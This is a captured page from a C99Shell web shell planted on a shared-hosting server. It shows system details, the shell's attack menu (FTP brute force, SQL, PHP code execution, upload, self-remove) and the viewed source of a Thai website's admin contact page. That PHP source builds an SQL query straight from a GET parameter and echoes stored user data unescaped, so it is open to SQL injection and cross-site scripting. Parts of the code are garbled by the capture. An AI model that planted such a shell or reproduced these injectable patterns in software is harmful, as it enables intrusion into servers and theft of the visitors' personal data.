!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/5.6.40 

uname -a: Linux cpanel06wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24
01:42:00 EDT 2020 x86_64
 

uid=851(cp949260) gid=853(cp949260) groups=853(cp949260) 

Safe-mode: OFF (not secure)

/home/cp949260/public_html/krupimhomecenter.com/office/   drwxr-xr-x
Free 237.83 GB of 981.82 GB (24.22%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     contactus_one.php (4.71 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<? 
include 'index_IncludeAdmin.php'
$_SESSION['page'] = 'contact.php';

if (isset(
$_GET[contactus_id])){
    
$_SESSION[contactus_id] =  $_GET[contactus_id];
}
$contactus_id =   $_SESSION[contactus_id] ;


$contactus_SL " SELECT * FROM contactus WHERE contactus_id = '$contactus_id'";
$contactus_QR mysqli_query($con,$contactus_SL);
$contactus     mysqli_fetch_array($contactus_QR);

?>

<!DOCTYPE html>
<html>
<head>
    <? include 'index_Head.php'?>
</head>
<body>
    <? include 'index_Navbar.php'?>    
    <div class="container-fluid">
        <div class="row">
            <div class="col-md-2" id="main-left">
                <div class="row">
                    <div class="col-md-12">
                        <? include 'index_AdminMenu.php'?>
                    </div>
                </div>
            </div>
            <div class="col-md-10">
                <div class="row">
                    <div class="col-md-12">
                        <h3>   การติดต่อเข้ามา  : <span class="text-primary bold"> <?php echo $contactus[contactus_name]; ?> </span>  </h3>
                        <hr>
                    </div>
                </div>
                <? include 'index_Alerts.php'?>
                <div class="row">
                    <div class="col-md-6 br-margin2">
                        <a href="contact.php" class="btn btn-primary"><span class="glyphicon glyphicon-step-backward"></span> กลับ </a>
                        <a href="contactus_del.php?contactus_id=<?php echo $contactus[contactus_id]; ?>" onclick="return confirm(' ยืนยันการลบข้อมูล  ? ')"  class="btn btn-danger">
                            <span class="glyphicon glyphicon-trash"></span>
                             ลบ
                        </a>
                    </div>
                    <div class="col-md-6">
                    </div>
                    <div class="col-md-12">
                        <div class="panel panel-default">
                            <div class="panel-heading">
                                รายละเอียด การติดต่อเข้ามา  : <span class="text-primary bold"> <?php echo $contactus[contactus_name]; ?> </span>
                            </div>
                            <div class="panel-body">
                                <div class="row br-margin3">
                                    <div class="col-md-12">
                                        <form class="form-horizontal">
                                            <div class="form-group">
                                                <label class="control-label col-md-3" > ชื่อ </label>
                                                <label class="control-label col-md-9 text-left">
                                                    <? echo $contactus[contactus_name]; ?>
                                                </label>
                                            </div>
                                            <div class="form-group">
                                                <label class="control-label col-md-3" > นามสกุล </label>
                                                <label class="control-label col-md-9 text-left">
                                                    <? echo $contactus[contactus_last]; ?>
                                                </label>
                                            </div>
                                            <div class="form-group">
                                                <label class="control-label col-md-3" > อีเมล  </label>
                                                <label class="control-label col-md-9 text-left">
                                                    <? echo $contactus[contactus_email]; ?>
                                                </label>
                                            </div>
                                            <div class="form-group">
                                                <label class="control-label col-md-3" > เบอร์โทรศัพท์  </label>
                                                <label class="control-label col-md-9 text-left">
                                                    <? echo $contactus[contactus_phone]; ?>
                                                </label>
                                            </div>
                                            <div class="form-group">
                                                <label class="control-label col-md-3" > เรื่อง  </label>
                                                <label class="control-label col-md-9 text-left">
                                                    <?
                                                    
if (isset($contactus[contactus_subject])&&trim($contactus[contactus_subject]!='')) {
                                                        echo 
$contactus[contactus_subject];
                                                    }
                                                    else{
                                                        echo 
" - ";
                                                    }
                                                    
?>
                                                </label>
                                            </div>
                                            <div class="form-group">
                                                <label class="control-label col-md-3" > รายละเอียด  </label>
                                                <label class="control-label col-md-9 text-left">
                                                    <?
                                                    
if (isset($contactus[contactus_message])&&trim($contactus[contactus_message]!='')) {
                                                        echo 
$contactus[contactus_message];
                                                    }
                                                    else{
                                                        echo 
" - ";
                                                    }
                                                    
?>
                                                </label>
                                            </div>
                                            <div class="form-group">
                                                <label class="control-label col-md-3" >วันเดือนปี </label>
                                                <label class="control-label col-md-9 text-left">
                                                    <? echo displaydate($contactus[contactus_date]); ?>
                                                </label>
                                            </div>
                                            <div class="form-group">
                                                <label class="control-label col-md-3" >เวลา </label>
                                                <label class="control-label col-md-9 text-left">
                                                    <? echo $contactus[contactus_time?>
                                                </label>
                                            </div>
                                        </form>
                                    </div>
                                    <!-- 7 -->
                                </div>
                            </div>
                        </div>
                    </div>
                    <!-- 12 -->
                </div>
                <!-- row -->
            </div>
            <!-- 10 -->
        </div>
        <!-- row -->
    </div>
    <!-- container -->
</body>
</html>



:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0111 ]--